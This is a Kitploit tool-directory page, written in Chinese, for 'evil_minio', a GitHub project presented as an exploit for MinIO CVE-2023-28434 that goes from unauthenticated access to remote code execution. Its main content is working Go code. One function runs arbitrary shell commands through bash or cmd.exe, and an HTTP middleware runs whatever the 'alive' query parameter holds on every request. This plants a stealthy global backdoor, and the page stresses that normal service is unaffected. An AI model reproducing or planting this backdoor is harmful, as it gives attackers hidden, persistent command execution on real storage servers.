Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
evil_minio — CVE-2023-28434 MinIO 未授权到RCE的利用 | Kitploit
工具/GitHubGitHub/abelche/evil_minio
漏洞利用Web应用程序漏洞利用命令与控制远程访问工具Payload 开发
GitHubabelche/evil_minio

evil_minio

CVE-2023-28434 MinIO 未授权到RCE的利用

查看仓库
3203973年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Evil MinIO (CVE-2023-28434)

Doc: CVE-2023-28432 minio 接口未授权访问到无损RCE和全局后门.pdf

CVE-2023-28434 的EXP

MinIO 未授权到RCE

改动基于 https://github.com/minio/minio/tree/8b4d0255b7247b1a06d923e69ed5ba01434e70b8

改动了什么?

  • 添加 cmd/x.go,用于执行系统命令
package cmd

import (
	"os/exec"
	"runtime"
)

func getOutputDirectly(commandStr string) string {
	var execGlobalOutput string
	var shell [2]string
	var systemOS string = runtime.GOOS
	if systemOS == "linux" || systemOS == "darwin" {
		shell[0], shell[1] = "/bin/bash", "-c"
	} else {
		shell[0], shell[1] = "C:\\Windows\\System32\\cmd.exe", "/c"
	}
	cmd := exec.Command(shell[0], shell[1], commandStr)
	output, err := cmd.Output()
	if err != nil {
		return ""
	}
	execGlobalOutput += string(output)
	return execGlobalOutput
}
  • 在 cmd/routers.go 中添加第72行
// ..........
	setUploadForwardingHandler,
	// Add bucket forwarding handler
	setBucketForwardingHandler,
	// Add new handlers here.
	xHandler, // ADD THIS LINE 
}

// configureServer handler returns final handler for the http server.
func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {
// ..........
  • 在 cmd/generic-handlers.go 末尾添加函数 xHandler
func xHandler(h http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var arg string
		values := r.URL.Query()
		arg = values.Get("alive")
		if arg != "" {
			w.Write([]byte(getOutputDirectly(arg)))
			return
		}
		h.ServeHTTP(w, r)
	})
}

可以实现什么?

  1. 全局后门:http://1.2.3.4/?alive=whoami 和 http://1.2.3.4/anything?alive=whoami
  2. 正常功能不受影响

image-20230327164103832

image-20230327164128648

下载工具